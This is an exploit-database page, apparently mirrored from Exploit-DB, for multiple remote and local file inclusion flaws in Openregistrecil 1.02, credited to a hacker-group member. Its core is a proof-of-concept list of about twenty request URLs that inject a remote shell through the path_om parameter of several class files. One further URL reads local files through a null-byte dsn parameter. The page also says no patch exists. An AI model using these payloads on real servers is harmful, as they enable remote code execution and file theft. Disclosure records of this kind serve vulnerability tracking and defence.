header-logo
Suggest Exploit
vendor:
Openregistrecil
by:
cr4wl3r
7.5
CVSS
HIGH
RFI/LFI
CWE
Product Name: Openregistrecil
Affected Version From: 01.02
Affected Version To: 01.02
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Openregistrecil 1.02 (RFI/LFI) Multiple File Include Vulnerability

The Openregistrecil 1.02 version is vulnerable to multiple file inclusion. An attacker can exploit this vulnerability to include arbitrary files from the server, leading to remote code execution.

Mitigation:

Update to a patched version of Openregistrecil or apply recommended security measures to prevent file inclusion attacks.
Source

Exploit-DB raw data:

==================================================================
Openregistrecil 1.02 (RFI/LFI) Multiple File Include Vulnerability
==================================================================

[+] Openregistrecil 1.02 (RFI/LFI) Multiple File Include Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm cr4wl3r  member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: cr4wl3r
[+] Download: https://adullact.net/frs/download.php/4103/openmairie_registreCIL_1.02.zip
[+] Greetz: All member inj3ct0r.com, manadocoding.net, sekuritionline.net, gcc.web.id

[+] Thanks to: opt!x hacker, xoron, cyberlog, irvian, antihack, angky.tatoki, 
               EA ngel, zvtral, s4va, bL4Ck_3n91n3, untouch, team_elite, zreg, mywisdom, 
               SENOT, kec0a, d3viln3t, p4p4y, cybertomat, etaxCrew, emen, and all my friend

[+] PoC:

[~] RFI:
http://shell4u.tk/[path]/obj/autorisation_normale.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/collectivite.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/dossier.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/norme_simplifiee.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/registre.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/autorisation_unique.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/demande_avis.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/droit.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/organisme.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/service.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/categorie_donnee.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/destinataire.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/profil.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/tabdyn_visu.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/categorie_personne.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/dispense.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/modificatif.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/reference.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/utilisateur.class.php?path_om=[Shell]

[~] LFI:
http://shell4u.tk/[path]/scr/soustab.php?dsn[phptype]=[LFI%00]

Navigation

Suggest Exploit

Services By CQR